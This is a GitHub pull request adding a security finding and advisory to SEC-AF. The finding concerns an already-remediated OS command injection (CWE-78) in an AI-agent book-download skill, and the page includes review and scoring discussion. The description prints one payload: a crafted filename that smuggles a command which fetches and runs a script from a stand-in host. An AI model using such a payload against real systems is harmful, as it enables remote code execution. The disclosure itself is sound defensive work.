Skip to content

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122

Open
Amr-Saad wants to merge 4 commits into
Agent-Field:mainfrom
Amr-Saad:finding/zlibrary-to-notebooklm-command-injection
Open

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122
Amr-Saad wants to merge 4 commits into
Agent-Field:mainfrom
Amr-Saad:finding/zlibrary-to-notebooklm-command-injection

Conversation

@Amr-Saad

@Amr-Saad Amr-Saad commented Jun 7, 2026

Copy link
Copy Markdown

What

A community-contributed, real-world finding in SEC-AF's verdict → trace → evidence format, added under exampl/:

  • exampl/zlibrary-to-notebooklm-command-injection.finding.json — structured finding (SEC-AF finding schema: cwe_id, evidence_level, proof.data_flow_evidence.steps, compliance, remediation…)
  • exampl/zlibrary-to-notebooklm-command-injection.md — readable advisory

Why it fits SEC-AF

It demonstrates exactly the class SEC-AF is built to prove: an OS command injection (CWE-78) in an AI-agent skill. The vulnerable project is an MIT-licensed agent "skill" (zlibrary-to-notebooklm) that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI.

Confirmed data flow: download.suggested_filename (attacker-controllable — the book uploader sets it) → download_pathtitle/file_path → f-strings → subprocess.run(..., shell=True) at 7 sinks (1 in convert_to_txt, 6 in upload_to_notebooklm). A book named '; curl https://evil.example/x.sh | sh; '.epub yields RCE when the skill processes it. The wrapping single-quotes are not a defence.

Responsible disclosure

The finding is already remediated — all seven sinks refactored to list-argv with shell=False, preserving behaviour (verified py_compile + zero shell=True). It is contributed as an example/fixture with the fix included, not a live 0-day.

Verdict

confirmed · severity high · evidence level 5 · CWE-78 · OWASP A03:2021.

…otebooklm)

A community-contributed, real-world finding in SEC-AF's verdict/trace/evidence
format, demonstrating the OS command-injection class (CWE-78) in AI-agent skills.

The vulnerable project is an MIT-licensed agent "skill" that auto-downloads a book
from Z-Library and shells out to the NotebookLM CLI. `download.suggested_filename`
(attacker-controllable) flows into f-strings run with subprocess.run(..., shell=True)
at 7 sinks -> RCE via a crafted book filename. Already remediated (list-argv,
shell=False); included as an example/fixture, not a live 0-day.

Files:
- exampl/zlibrary-to-notebooklm-command-injection.finding.json  (SEC-AF finding schema)
- exampl/zlibrary-to-notebooklm-command-injection.md            (readable advisory)
@CLAassistant

Copy link
Copy Markdown

CLA assistant check
Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.
You have signed the CLA already but the status is still pending? Let us recheck it.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 361dda2943

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json
…ifiedFinding

The fixture is advertised as a SEC-AF finding, so consumers must be able to
load it with sec_af.schemas.prove.VerifiedFinding. It previously omitted
required fields and carried non-schema-shaped nested objects, so
VerifiedFinding.model_validate(...) would reject it:

- top-level: add required rationale, sarif_rule_id, sarif_security_severity
  (+ tags)
- proof: add required exploit_hypothesis, verification_method, evidence_level;
  fold the non-schema exploit_scenario into exploit_hypothesis and map the
  payload/outcome onto Proof.exploit_payload / Proof.expected_outcome;
  data_flow_evidence already matched DataFlowEvidence
- remediation: reshape to RemediationSuggestion (fix_description, patch_diff,
  confidence) from the prior non-schema summary/before/after/status/notes
- compliance/location were already schema-valid

Add tests/test_example_findings.py: parametrized over exampl/*.finding.json,
asserts each loads via VerifiedFinding.model_validate and that proof/
remediation, when present, are fully-formed. Guards every example finding,
current and future, against schema drift. Validated locally (pydantic 2.12.5;
2 passed).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: c3c2041228

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json Outdated
…engine

The committed example understated the same finding the platform would emit.
SEC-AF's own scoring (sec_af.scoring) floors CWE-78 to critical and recomputes
exploitability_score = severity x evidence x reachability x chain, mirroring
the result into sarif_security_severity (orchestrator.py:383-385).

For this confirmed, level-5 RCE whose taint source is a remote attacker-
controlled filename, the engine produces: critical (10.0) x EXPLOIT_SCENARIO_
VALIDATED (0.9) x externally_reachable (1.0) x no-chain (1.0) = 9.0.

- severity: high -> critical
- exploitability_score: 3.0 -> 9.0
- sarif_security_severity: 8.8 -> 9.0 (mirrors exploitability_score)
- tags: + externally_reachable (the honest reachability bucket - taint enters
  from a remote, unauthenticated source; without it the engine's non-empty-tag
  fallback would score 4.5, still understating a confirmed RCE)
- rationale + companion .md updated to match

Strengthen tests/test_example_findings.py with
test_example_finding_agrees_with_platform_scoring: re-runs the engine's
floor + score pass over every fixture and asserts the stored values equal the
recomputation, so an example can never again silently disagree with the
platform. Verified locally: 3 passed (engine recomputes severity=critical,
score=9.0).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@santoshkumarradha

Copy link
Copy Markdown
Member

@Amr-Saad thanks for this. The finding and fixture tests look solid, and the focused pytest passes.

One small thing before this is ready: ruff wants the imports in tests/test_example_findings.py reordered, with sec_af.schemas.prove before sec_af.scoring. The CLA check is also still pending.

Place `sec_af.schemas.prove` before `sec_af.scoring` (alphabetical
first-party ordering) per ruff isort. Addresses review feedback on PR Agent-Field#122.

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
@chatgpt-codex-connector

Copy link
Copy Markdown

You have reached your Codex usage limits for code reviews. You can see your limits in the Codex usage dashboard.
To continue using code reviews, add credits to your account and enable them for code reviews in your settings.

@Amr-Saad

Copy link
Copy Markdown
Author

Thanks @santoshkumarradha — addressed:

  • ruff import order in tests/test_example_findings.py: moved from sec_af.schemas.prove import … above from sec_af.scoring import … (alphabetical first-party ordering). ruff check tests/test_example_findings.pyAll checks passed, and the focused pytest tests/test_example_findings.py is green (3 passed). Pushed in 769100c.
  • CLA: still pending on my side — I'll get it signed so the check clears.

🤖 Addressed by Claude Code

@santoshkumarradha

Copy link
Copy Markdown
Member

Thanks @santoshkumarradha — addressed:

  • ruff import order in tests/test_example_findings.py: moved from sec_af.schemas.prove import … above from sec_af.scoring import … (alphabetical first-party ordering). ruff check tests/test_example_findings.pyAll checks passed, and the focused pytest tests/test_example_findings.py is green (3 passed). Pushed in 769100c.
  • CLA: still pending on my side — I'll get it signed so the check clears.

🤖 Addressed by Claude Code

Awesome, once done pr is gtg

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants